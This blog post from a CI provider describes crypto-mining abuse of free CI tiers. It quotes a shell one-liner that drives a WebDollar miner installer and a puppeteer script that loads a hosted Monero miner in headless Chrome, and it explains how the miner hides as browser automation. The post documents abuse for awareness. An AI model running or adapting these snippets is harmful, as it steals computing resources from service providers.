Crypto miners are killing free CI

On September 1st, 2020, GitLab announced that their free CI offering was being restricted in response to "usage." Two months later, TravisCI announced that a similar restriction in response to "significant abuse."

Concurrently with these pricing changes, the market capitalization of mineable cryptocurrencies has exploded.

The market capitalization of crypto has jumped from 190bn to 2tn in a single year

These events are related: As the market capitalization of cryptocurrency surged from $190 billion in January of 2020 to $2 trillion in April of 2021, it's become profitable for bad actors to make a full time job of attacking the free tiers of platform-as-a-service providers.

Context

At webapp.io, we help developers build full-stack websites by creating per-branch preview environments and running end-to-end tests for them automatically. This is called CI (Continuous Integration.)

Because developers can run arbitrary code on our servers, they often violate our terms of service to run cryptocurrency miners as a "build step" for their websites. You can learn more in our docs.

717 GitHub commits in one month

"testronan" is an avid Flask user. Every hour they make a commit to their only GitHub repository: "testronan/MyFirstRepository-Flask"

The prolific programmer is certainly making sure that their contributions are well tested. Their repository contains configurations for five different CI providers: TravisCI, CircleCI, GitHub Actions, Wercker, and webapp.io.

Seemingly quite proficient at shell scripting, their CI tasks run "listen.sh": A shell script that combines a complicated NodeJS script with some seemingly random numbers:

(sleep 10; echo 4; sleep 2; echo "tex.webd";sleep 2; echo 7; sleep 1; echo 1; sleep 1; echo "exit"; sleep 2) | stdbuf -oL npm run commands

MyFirstRepository-Flask has nothing to do with Flask or webservers. It hosts cryptocurrency mining scripts that send WebDollars to an anonymous address. The numbers correspond to installation options for the NodeJS implementation of WebDollar

The repository is not attacking GitHub directly, instead it abuses GitHub actions' "cron" feature to create a new commit every hour and mine WebDollars on four other CI providers.

At WebDollar's April peak price of $.0005, the repository was making $77USD per month - a considerable sum in many countries, especially given that the only tools required are a laptop and an internet connection.

The two wallet addresses that receive these coins are:

Headless browser cryptocurrency mining

"vippro99" is less subtle about their intentions. Out of dozens of repositories, most are related to cryptocurrency or browser automation.

The nodejs-monney repository contains various scripts to start instances of chrome with the Google's popular puppeteer project.

The idea is simple: Mining cryptocurrency directly in CI is somewhat easily detectable (with executable content analysis, for example) but browser automation is a common workload within CI.

puppeteer.launch({ headless: true, args: ['--no-sandbox', '--disable-setuid-sandbox', '--window-size=500,500', '--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36' ] }).then(async browser => {
  console.log('-- Running chrome!!');
  const page = await browser.newPage();
  await page.goto('https://vippro99.github.io/-meocoder-nodejs-tool/index.html');
  page.on('console', (msg) => console.log(msg.text()));
  await page.waitForTimeout(((Math.floor(Math.random() * 6) + 52) * 60) * 1000);
  await browser.close();

})

The referenced GitHub pages website contains a simple browser-based Monero miner, reminiscent of Coinhive.

As of writing, the account is currently attacking JFrog's Shippable CI, which (perhaps relatedly) announced the end of its free tier earlier this year.

"vippro99"'s comments indicate that they are in Vietnam. At the current price of Monero, each instance of their cryptocurrency miner on Shippable is giving $2.5USD per month, so maintaining a mere 60 concurrent instances would be equivalent to a full time job in that country.

A solution for crypto

Ethereum, the second most popular cryptocurrency, recently announced plans to fully disable computation-based mining as a way to earn new Ethereum, switching entirely to a proof-of-stake (POS) validation model.

Beyond the environmental impact of traditional "proof of work" mining, there are externalities in many other fields like worldwide GPU shortages and attacks on free tiers of compute platforms like CI.

Providers can do their best to enforce terms of service, but as long as it's profitable and untraceable to make such attacks, they will continue to become more sophisticated and circumvent measures. The only long-term way that we will continue to be able to enjoy free tiers on Heroku, Netlify, and GitHub are to switch away from proof-of-work.

Discussion: HackerNews, r/programming